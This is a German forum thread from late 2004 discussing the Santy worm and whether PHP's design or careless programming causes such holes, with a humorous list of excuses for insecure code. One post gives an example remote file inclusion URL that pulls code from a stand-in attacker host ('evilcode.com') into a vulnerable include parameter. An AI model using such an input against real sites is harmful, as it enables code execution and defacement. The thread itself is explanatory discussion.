Habe grade mal die User-Foren auf heise zu den diversen Santy-Wurm-Meldungen durchgelesen.

Ich finde es, gelinde ausgedrueckt, erschreckend was sich da so zusammenbraut. Wenn man das ganze mal weiterspinnt, sind die Auswuechse die sich daraus entwickeln koennen und die Varianten der moeglichen Schweinereien ziemlich endlos.

Was ich mich nun frage ist: Wie konnte es in einem solchen Ausmass dazu kommen? Liegt's nur an den schlampig geschriebenen Skripten? Ist es ein Design-Fehler von PHP? Oder an was ganz anderem? Was denkt Ihr darueber?

Oh, wir haben da schon heftig drüber diskuttiert, siehe:
'Sonstige Beiträge im Abseits'->'Wurm in Perl geschrieben'.
Die Auffassungen gehen da WEIT auseinander.\n\n

<!--EDIT|Ronnie|1104428096-->

Jaja, den Thread hab ich schon gelesen. Aber da ging es (schien mir jedenfalls so) mehr um die angebliche oder wirklich stattgefundene Google-Filterung, ob solche Exploits moralisch OK sind (oder eben nicht) und das ab einer Gewissen Menge an IT-Infrastruktur und Vorgesetzten das ganze unuebersichtlich und / oder unwartbar wird.

Wahrscheinlich kam das im Erst-Posting nicht so rueber, aber mich wuerde eher die "technische" Ursache und deren Loesung interressieren...

Zum einen koennte man z.B. sagen das die ungeprueft ans System uebergebenen Parameter schuld sind - damit waere es ein allgemeines Problem und nicht PHP spezifisch. Und das obwohl jeder Newbie wieder und wieder von den alten Hasen eingehaemmert bekommt, das man das einfach nicht tut, das register_globals boese ist und das man bei Perl den Taint-Modus verwenden soll.

Man koennte sich jetzt noch ueber die allgemeine Qualitaet des Codes auslassen, aber das fuehrt unweigerlich zum "Perl vs. PHP vs. Everyone Else"-Coder-Bashing, also lassen wir das.

Andererseits war mehrfach zu lesen, das PHP auch Includes ueber URLs ausfuehrt, was das "nachinstallieren" von richtig fiesem Code erst moeglich macht.

Ich hab so gut wie keinen Plan von PHP, weil ich irgendwann wegen vielen mich nervenden Dingen in dieser Sprache beschlossen habe, mich nicht weiter damit zu beschaeftigen. Aber ich wuerde doch vermuten das es da irgendeine Art von Eingriffsmoeglichkeit seitens des Admins/Coders/Users geben sollte, oder etwa nicht?

Wenn nicht, hab ich ab jetzt noch einen Grund mehr die Sprache nicht zu lernen...

dieser fehler hätte wohl mit jeder anderen programmiersprache passieren können; liegt einfach daran, dass sich die meisten (web)programmierer einfach keine gedanken machen; die meisten haben es auch nie richtig "gelernt" und programmieren drauf los ohne zu überlegen.

Das hat mit PHP nichts zu tun. Wenn ein Programm "schlecht" geschrieben ist, hat alles Sicherheitslücken. Oft denkt der Programmierer gar nicht daran, dass das überhaupt ein möglicher Exploit sein _könnte_.
Es gibt ja auch in vielen teuren Programmen Exploits (wie z.B. in Microsoft-Programmen)!

Der "Erfolg" von Santy und ähnlichen Skripten hat sicherlich auch damit zu tun, dass sie weit verbreitet sind. So kann sich jemand, der es darauf anlegt schädlichen Code zu schreiben, sich mit den Programmen auseinandersetzen kann und sich dann gezielt eine mögliche Sicherheitslücke aussucht, die er angreift.

Das häufig PHP-Skripte angegriffen werden liegt sicherlich auch daran, dass viele "Neulinge" mal schnell was programmieren wollen und PHP total "in" ist. Dabei kennen diese "Programmierer" häufig nicht mal grundlegende Dinge wie "Traue nie einer Benutzereingabe".

An anderen Sicherheitslücken können normale Programmierer nichts ändern, wenn diese von der Sprache selbst kommen...

[quote=Cremator,30.12.2004, 19:24]Und das obwohl jeder Newbie wieder und wieder von den alten Hasen eingehaemmert bekommt, das man das einfach nicht tut, das register_globals boese ist und das man bei Perl den Taint-Modus verwenden soll.[/quote]
Und hier die Top-Ten der Antworten auf die Frage, warum eine unsichere Loesung einer sicheren Loesung vorgezogen wird:

10.) "Ja ich weiss, das aendere ich gleich morgen."
9.) "Du hast ja wohl recht, aber ich programmiere noch nicht so lange."
8.) "Deine Loesung habe ich nicht verstanden, ich lass es lieber so."
7.) "Das ist mir zu kompliziert."
6.) "Das ist mir zu aufwaendig."
5.) "Ach was, da ist gar kein Problem."
4.) "Das habe ich bisher immer so gemacht."
3.) "Ich habe das aus $OBSKURE_QUELLE, daher muss das so richtig sein."
2.) "Wenn ich das aendere, funktioniert der Rest nicht mehr."

Und die Top-Antwort auf die Frage, warum eine unsichere Loesung einer sicheren Loesung vorgezogen wird, lautet:
.
.
.

1.) "Ach, wer soll schon meine Seiten hacken wollen."

ich find nummer 2 die Beste! :)

naja, bei php ist es eben leicht, so eine sicherheitslücke einzubauen, nehmen wir nur mal das ganze thema rund um url_open, wodurch man urls wie dateien (mit fopen) öffnen kann.
nun schreibt jemand sowas wie index.php?include=inhalt.html - wenn er das mit perl macht, ist das unsauber, gibt aber nicht gleich so ein massives problem. bei php allerdings kann man, wenn url_open on ist, einfach index.php?include=http://www.evilcode.com/letsdeface.txt einbinden und der fremde code wird dann included und wiederum auf php geparsed und ausgeführt - und schon ist man dabei.
ich denke ebenfalls, es ist primär ein problem der entwickler, zB benutzt zwar so ziemlich jeder mit php auch mysql, aber nur wenige lassen die strings, die sie in ihre sql-statements einsetzen, vorher auch quoten o_O

aber wie man gerade sehen kann, hat das nicht immer was mit php zu tun

[quote=jan,31.12.2004, 14:00]und der fremde code wird dann included und wiederum auf php geparsed und ausgeführt[/quote]
Seit wann wird fremder Code beim Öffnen eines Files geparsed? Verwechselst du das jetzt etwa mit include() oder require()?